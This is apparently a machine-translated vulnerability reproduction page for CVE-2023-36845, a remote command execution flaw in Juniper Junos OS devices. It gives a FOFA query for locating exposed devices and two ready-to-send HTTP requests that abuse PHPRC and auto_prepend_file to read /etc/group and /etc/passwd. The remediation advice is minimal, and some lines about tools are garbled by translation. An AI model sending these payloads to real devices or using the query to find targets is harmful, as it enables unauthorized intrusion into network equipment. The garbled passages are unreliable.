Juniper Networks Junos OS EX Remote Command Execution Vulnerability (CVE-2023-36845)

Disclaimer: Please do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article will be the responsibility of the user himself. All consequences incurred Adverse consequences have nothing to do with the author of the article. This article is for educational purposes only.

1: Vulnerability description

Juniper Networks Junos OS EX is a network operating system of the American Juniper Networks company dedicated to the company's hardware equipment. It contains a PHP environment variable manipulation vulnerability affecting Juniper SRX firewalls and EX switches. An attacker can perform remote command execution without authorization.

2: Vulnerability affected versions

所有version < 21.4R3-S5
22.1version < 22.1R3-S4
22.2version < 22.2R3-S2
22.3version < 22.3R2-S2、22.3R3-S1
22.4version < 22.4R2-S1、22.4R3
23.2version < 23.2R1-S1、23.2R2

Three: Cyberspace surveying and mapping query

fofa:title=“Juniper Web Device Manager”

4. Recurrence of vulnerabilities

1. Manual reproduction

Recurring POC1

POST /?PHPRC=/dev/fd/0 HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
Sec-Ch-Ua: "-Not.A/Brand";v="8", "Chromium";v="102"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9


auto_prepend_file="/etc/group"

burpsuite screenshot

Reproduced POC2

POST /?PHPRC=/dev/fd/0 HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
Sec-Ch-Ua: "-Not.A/Brand";v="8", "Chromium";v="102"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9


auto_prepend_file="/etc/passwd"

burpsuite screenshot

2. Automated recurrence

Xiaolong POC detection tool for a while

Another touching piece of azuki red

7. Repair suggestions

Upgraded version
Block sensitive code execution